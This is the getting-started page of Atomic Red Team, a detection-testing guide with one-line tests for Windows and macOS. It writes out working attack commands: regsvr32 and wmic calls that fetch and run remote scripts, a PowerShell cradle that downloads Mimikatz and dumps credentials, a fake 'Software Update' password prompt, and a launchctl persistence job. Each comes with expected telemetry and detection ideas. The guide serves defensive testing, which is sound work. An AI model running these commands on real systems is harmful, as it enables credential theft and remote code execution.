Atomic Red Team

Getting Started

1: Run

Start by running some of the most popular tests on Windows and macOS. In most environments, these should be sufficient to generate a useful signal for defenders.

Regsvr32

Run this:

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll

And you can expect this:

Useful Telemetry:
  • Process monitoring (regsvr32.exe)
  • Network connection (regsvr32.exe establishing a network connection and the presence of a URL)
  • Module load (scrobj.dll)
Detection:

Alerting based on suspicious behavior.

 


Credential Dumping

Run this:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCr"

And you can expect this:

Useful Telemetry:
  • Process monitoring (powershell.exe)
  • Process command line (“DownloadString”, “WebClient”, and the presence of a URL)
  • Network connection (powershell.exe establishing an external network connection)
Detection:

Alerting based on PowerShell command line and download.

 


XSL Script Processing

Run this:

wmic.exe process list /FORMAT:”https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl”

And you can expect this:

Useful Telemetry:
  • Process monitoring (wmic.exe)
  • Process command line (“/FORMAT”, url on command line)
  • Network connection (wmic.exe establishing a network connection to remote resource)
Detection:

Alerting based on WMIC suspicious usage.

Input Prompt

Run this:

osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'

And you can expect this:

Useful Telemetry:
  • Process monitoring (osascript)
  • Process command line (command line usage of -e, “password”, “tell app” )
Detection:

Alert on keywords via command line and baseline osascript usage.

 


Launchctl

Run this:


launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator

And you can expect this:

Useful Telemetry:
  • Process monitoring (launchctl)
Detection:

Baseline usage of launchctl and alert on new (submit) usage

2: Review

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

These are just a few of the questions you can ask. And because test execution is fast, the majority of your time can be spent where it is most valuable: Reviewing the results of your tests, improving your understanding of the environment and controls, and making improvements.

3: Repeat

Once you’ve made any changes or addressed gaps in your detection coverage, repeat the process to ensure coverage, expanding out from these techniques into others that you know to be relevant based on threat intelligence, baselining, or the recommendations of others.